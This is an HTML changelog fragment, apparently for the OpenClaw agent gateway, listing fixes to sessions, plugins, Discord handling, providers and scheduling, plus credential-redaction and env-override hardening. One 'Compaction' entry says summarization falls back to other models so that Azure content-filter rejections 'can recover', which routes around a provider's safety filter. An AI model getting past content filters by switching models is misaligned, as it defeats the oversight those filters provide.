<p>Agents/session-locks: reclaim untracked current-process session locks with matching starttime during acquisition and startup cleanup, so Gateway restarts recover from self-owned orphan <code>.jsonl.lock</code> files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366526190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75805" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75805/hovercard" href="https://github.com/openclaw/openclaw/issues/75805">#75805</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093489842" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49603" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49603/hovercard" href="https://github.com/openclaw/openclaw/issues/49603">#49603</a>. Thanks @cdznho.</p>
</li>
<li>
<p>Agents/subagents: initialize built-in context engines before native <code>sessions_spawn</code> resolves spawn preparation, so cliBackend-only cold starts no longer fail with an unregistered <code>legacy</code> context engine. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339592375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73095/hovercard" href="https://github.com/openclaw/openclaw/issues/73095">#73095</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347197163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73904/hovercard" href="https://github.com/openclaw/openclaw/pull/73904">#73904</a>) Thanks @brokemac79.</p>
</li>
<li>
<p>Plugins/Bonjour: ship the ciao runtime dependency with packaged OpenClaw so fresh OCM envs can start default mDNS discovery without a missing-module failure. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: scope reply plugin-tool discovery to manifest-declared tool owners and already-active matching tool entries, avoiding broad plugin runtime loading for narrow or core-only tool allowlists. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/replies: defer implicit image model discovery and keep OAuth auth-store adoption on persisted profiles during reply startup, cutting OCM MarCodex warm prep to sub-second in live checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/tools: enforce <code>contracts.tools</code> as the manifest ownership contract for plugin tool registration, rejecting undeclared runtime tool names and adding bundled plugin drift coverage. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/Codex: stop prompting message-tool-only source turns to finish with <code>NO_REPLY</code>, so quiet turns are represented by not calling the visible message tool instead of conflicting final-text instructions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Gateway/config: report failed backup restores as failed in logs and config observe audit records instead of marking them valid. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314005687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70515" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70515/hovercard" href="https://github.com/openclaw/openclaw/pull/70515">#70515</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</p>
</li>
<li>
<p>Compaction: use the active session model fallback chain for implicit summarization failures without persisting fallback model selection, so Azure content-filter 400s can recover. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245460651" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64960" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64960/hovercard" href="https://github.com/openclaw/openclaw/issues/64960">#64960</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352068136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74470/hovercard" href="https://github.com/openclaw/openclaw/pull/74470">#74470</a>) Thanks @jalehman and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</p>
</li>
<li>
<p>Gateway/config: allow <code>gateway config.patch</code> to update documented subagent thinking defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365780380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75764" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75764/hovercard" href="https://github.com/openclaw/openclaw/issues/75764">#75764</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366498289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75802" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75802/hovercard" href="https://github.com/openclaw/openclaw/pull/75802">#75802</a>) Thanks @kAIborg24.</p>
</li>
<li>
<p>Plugins/CLI: keep git plugin install paths credential-free, preserve existing git checkouts until replacement succeeds, honor duplicate npm install mode, and remove managed git repos on uninstall. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/CLI: redact authenticated git URLs from git install command failure details, so failed clone or checkout output cannot leak credentials during plugin installs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Channels/status reactions: remove stale non-terminal lifecycle reactions when a run reaches done or error, so Discord does not leave a permanent thinking emoji after completion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363092374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75458/hovercard" href="https://github.com/openclaw/openclaw/issues/75458">#75458</a>. Thanks @davelutztx.</p>
</li>
<li>
<p>Discord/doctor: migrate unsupported per-channel <code>agentId</code> entries under guild channel config into top-level <code>bindings[]</code> routes, so <code>openclaw doctor --fix</code> preserves the intended agent route instead of stripping it as an unknown key. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217423565" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62455" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62455/hovercard" href="https://github.com/openclaw/openclaw/issues/62455">#62455</a>. Thanks @lobster-biscuit.</p>
</li>
<li>
<p>Discord/DMs: set inbound direct-message <code>ctx.To</code> to the semantic <code>user:&lt;id&gt;</code> target while keeping delivery routed through the DM channel, so mirror and recovery paths do not treat DMs as channel conversations. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4282995155" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68126" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68126/hovercard" href="https://github.com/openclaw/openclaw/issues/68126">#68126</a>. Thanks @illuminate0623.</p>
</li>
<li>
<p>Discord/DMs: keep no-guild inbound messages on direct-message routing when Discord channel lookup is temporarily unavailable, preventing degraded DMs from forking into channel sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195831671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59817" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59817/hovercard" href="https://github.com/openclaw/openclaw/issues/59817">#59817</a>. Thanks @DooPeePey.</p>
</li>
<li>
<p>Discord: retry outbound API calls on HTTP 5xx, request-timeout, and transient transport failures instead of only Discord rate limits, reducing dropped cron and agent replies during short Discord or network outages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116577020" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52396" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52396/hovercard" href="https://github.com/openclaw/openclaw/issues/52396">#52396</a>. Thanks @sunshineo.</p>
</li>
<li>
<p>Discord: include Components v2 Text Display content from referenced replies and forwarded snapshots, so component-only messages still appear in reply context. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158079453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56228" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56228/hovercard" href="https://github.com/openclaw/openclaw/issues/56228">#56228</a>. Thanks @HollandDrive.</p>
</li>
<li>
<p>Discord: add configurable gateway READY timeouts for startup and runtime reconnects, so staggered multi-account setups can avoid false restart loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331372526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72273" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72273/hovercard" href="https://github.com/openclaw/openclaw/issues/72273">#72273</a>. Thanks @sergionsantos.</p>
</li>
<li>
<p>Discord: preserve native slash-command description localizations through command reconcile, so localized Discord descriptions no longer get overwritten by English defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161405333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56580" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56580/hovercard" href="https://github.com/openclaw/openclaw/issues/56580">#56580</a>. Thanks @mhseo93.</p>
</li>
<li>
<p>Discord: add configured outbound mention aliases so known <code>@Name</code> references can be rewritten to real Discord user mentions instead of relying only on the transient directory cache. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274166014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67587/hovercard" href="https://github.com/openclaw/openclaw/issues/67587">#67587</a>. Thanks @McoreD.</p>
</li>
<li>
<p>Discord: avoid startup REST amplification by skipping native command deploy retries after Discord rate limits and deriving the bot id from parseable bot tokens instead of requiring a <code>/users/@me</code> lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362306201" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75341" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75341/hovercard" href="https://github.com/openclaw/openclaw/issues/75341">#75341</a>. Thanks @PrinceOfEgypt.</p>
</li>
<li>
<p>Plugins/hooks: derive hook <code>ctx.channelId</code> from the conversation target instead of the provider name, so Discord and other channel plugins can keep per-channel state isolated. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4196584916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59881" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59881/hovercard" href="https://github.com/openclaw/openclaw/issues/59881">#59881</a>. Thanks @bradfreels.</p>
</li>
<li>
<p>Gateway/config: log config health-state write failures instead of silently hiding config observe-recovery write errors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</p>
</li>
<li>
<p>Diagnostics: reset stuck-session timers on reply, tool, status, block, and ACP progress events, and back off repeated <code>session.stuck</code> diagnostics while a session remains unchanged. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330206713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72010" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72010/hovercard" href="https://github.com/openclaw/openclaw/pull/72010">#72010</a>. Thanks @rubencu.</p>
</li>
<li>
<p>Gateway/agents: avoid rebuilding core tools for plugin-only allowlists and keep the full plugin registry cache warm across scoped plugin loads, reducing per-turn latency spikes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367404227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75882" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75882/hovercard" href="https://github.com/openclaw/openclaw/issues/75882">#75882</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367580317" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75907" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75907/hovercard" href="https://github.com/openclaw/openclaw/issues/75907">#75907</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367573379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75906" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75906/hovercard" href="https://github.com/openclaw/openclaw/issues/75906">#75906</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367498934" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75887" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75887/hovercard" href="https://github.com/openclaw/openclaw/issues/75887">#75887</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367081946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75851" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75851/hovercard" href="https://github.com/openclaw/openclaw/issues/75851">#75851</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367733132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75922" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75922/hovercard" href="https://github.com/openclaw/openclaw/pull/75922">#75922</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Agents/failover: classify bare <code>status: internal server error</code> provider messages as retryable server errors so model fallback can rotate instead of stopping. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346697764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73844" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73844/hovercard" href="https://github.com/openclaw/openclaw/pull/73844">#73844</a>) Thanks @thesomewhatyou.</p>
</li>
<li>
<p>Gateway/startup: return the shared retryable startup-sidecars error for startup-gated control-plane RPCs such as sessions.create, sessions.send, sessions.abort, agent.wait, and tools.effective, so clients can retry early sidecar races. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368487370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76012" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76012/hovercard" href="https://github.com/openclaw/openclaw/pull/76012">#76012</a>) Thanks @scoootscooob.</p>
</li>
<li>
<p>Providers/Google: fix Gemini 2.5 Flash-Lite <code>reasoning: "minimal"</code> rejections by raising its thinking-budget floor to 512 while preserving the existing Gemini 2.5 Pro and Flash minimal presets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316577583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70629" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70629/hovercard" href="https://github.com/openclaw/openclaw/pull/70629">#70629</a>) Thanks @ericberic.</p>
</li>
<li>
<p>Agents/status: resolve <code>session_status(sessionKey="current")</code> for sparse channel-plugin sessions after literal current lookups miss, so Scope, Slack, Discord, and other plugin-driven agents avoid retrying through <code>Unknown sessionKey: current</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348384116" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74141" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74141/hovercard" href="https://github.com/openclaw/openclaw/issues/74141">#74141</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331560781" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72306" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72306/hovercard" href="https://github.com/openclaw/openclaw/pull/72306">#72306</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>.</p>
</li>
<li>
<p>Cron: retry recurring wake-now main-session jobs through temporary heartbeat busy skips before recording success, so queued cron events no longer appear as ok ghost runs while the main lane is still busy. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368042745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75964" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75964/hovercard" href="https://github.com/openclaw/openclaw/issues/75964">#75964</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369011338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76083" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76083/hovercard" href="https://github.com/openclaw/openclaw/pull/76083">#76083</a>) Thanks @kshetrajna12 and @xuruiray.</p>
</li>
<li>
<p>Providers/Google: keep Gemini thinking-signature-only stream chunks active during reasoning, so Gemini 3.1 Pro Preview replies no longer hit idle timeouts before visible text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368880968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76071" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76071/hovercard" href="https://github.com/openclaw/openclaw/issues/76071">#76071</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368997122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76080" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76080/hovercard" href="https://github.com/openclaw/openclaw/pull/76080">#76080</a>) Thanks @marcoschierhorn and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</p>
</li>
<li>
<p>CLI/skills: show per-agent model and command visibility in <code>openclaw skills check --agent</code>, and let doctor report or disable unavailable skills allowed for the default agent. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368251753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75983" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75983/hovercard" href="https://github.com/openclaw/openclaw/pull/75983">#75983</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</p>
</li>
<li>
<p>Agents/tools: skip unavailable media generation and PDF tool factories from the live reply path when Gateway metadata and the active auth store prove no configured provider can back them, while keeping explicit config and auth-backed providers on the normal factory path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: reuse the Gateway metadata startup plan when ensuring reply runtime plugins are loaded, so live agent turns do not broad-load plugin runtimes after the Gateway already scoped startup activation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: delegate scoped reply runtime registry reuse to the plugin loader cache-key compatibility checks, so config changes with the same startup plugin ids cannot keep stale runtime hooks or tools active. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: let compatible wider plugin registries satisfy scoped reply runtime requests when they already contain the requested plugins, avoiding redundant runtime loading without bypassing loader cache-key freshness checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: validate agent model allowlists against manifest model catalog metadata during reply startup, avoiding broad provider runtime catalog loading before the agent run lane starts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: keep allowlisted configured model thinking metadata available when manifest catalog rows are absent, so explicit high-reasoning levels remain valid for custom configured models. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: preserve plugin-declared config-only generation providers such as local Comfy workflows during reply tool pre-gating, and share manifest auth/config availability checks between the planner and final tool factories. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: keep Comfy generation tools visible from legacy local workflow config and cloud API-key config when no Gateway metadata snapshot is active, using plugin-declared manifest signals instead of loading provider runtimes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: route media and generation capability lookups through the Gateway plugin metadata snapshot during reply tool registration, avoiding repeated manifest registry reloads on the live reply path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: let plugins declare media generation auth aliases and base-url guards in manifests, preserving OpenAI Codex OAuth image generation availability without core-owned provider special cases. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: reuse the auth profile store already loaded for the active run when deciding media and generation tool availability, avoiding repeated provider-auth runtime discovery during reply startup. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: keep image, video, and music generation tool registration on manifest/auth control-plane checks instead of loading runtime provider registries during reply startup, reducing live-path tool-prep blocking while leaving provider runtime resolution for execution and list actions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Discord: document canonical mention formatting in agent prompt hints and channel docs so outbound replies use <code>&lt;@USER_ID&gt;</code>, <code>&lt;#CHANNEL_ID&gt;</code>, and <code>&lt;@&amp;ROLE_ID&gt;</code> instead of legacy nickname mentions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359907332" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75173/hovercard" href="https://github.com/openclaw/openclaw/pull/75173">#75173</a>)</p>
</li>
<li>
<p>Heartbeat scheduler: gate exec-event/notification/spawn/retry wakes through a centralized cooldown so backgrounded <code>process.start</code> exit notifications can no longer self-feed runaway heartbeat runs (configured <code>every: "30m"</code> was firing every ~10s in production, pegging the gateway event loop with <code>eventLoopDelayMaxMs &gt;6s</code> spikes that stalled control-UI asset serving and TUI handshakes). Documented wake-now paths (<code>manual</code>, <code>wake</code>, task completion, blocked-task follow-up, <code>/hooks/wake mode=now</code>, and cron <code>--wake now</code>) remain immediate; retryable busy skips no longer poison the cooldown for the next retry; per-agent flood guard caps any unexpected feedback loop at 5 runs/60s. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236016269" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64016" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64016/hovercard" href="https://github.com/openclaw/openclaw/issues/64016">#64016</a>, refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3946045245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/17797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/17797/hovercard" href="https://github.com/openclaw/openclaw/issues/17797">#17797</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362911805" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75436" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75436/hovercard" href="https://github.com/openclaw/openclaw/issues/75436">#75436</a>) Thanks @hexsprite.</p>
</li>
<li>
<p>fix: block workspace CLOUDSDK_PYTHON override and always set trusted interpreter for gcloud. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352375218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74492" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74492/hovercard" href="https://github.com/openclaw/openclaw/pull/74492">#74492</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>Providers/Z.AI: move the bundled GLM catalog and auth env metadata into the plugin manifest, so <code>models list --all --provider zai</code> shows the full known catalog without duplicated runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Providers/Qianfan and Providers/Stepfun: declare setup auth metadata (<code>api-key</code> method, <code>QIANFAN_API_KEY</code>, <code>STEPFUN_API_KEY</code>) in the plugin manifest so onboarding and <code>models setup</code> surface the expected env var without falling back to legacy <code>providerAuthEnvVars</code> runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>fix(infra): block ambient Homebrew env vars from brew resolution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351948564" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74463" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74463/hovercard" href="https://github.com/openclaw/openclaw/pull/74463">#74463</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>Onboarding/configure: avoid staging every default plugin runtime dependency after config writes, so skipped setup flows only prepare config-selected plugin deps instead of pulling broad feature-plugin packages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Thinking/providers: resolve bundled provider thinking profiles through lightweight provider policy artifacts when startup-lazy providers are not active, so OpenAI Codex GPT-5.x keeps xhigh available in Gateway session validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355122984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74796" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74796/hovercard" href="https://github.com/openclaw/openclaw/issues/74796">#74796</a>. Thanks @maxschachere.</p>
</li>
<li>
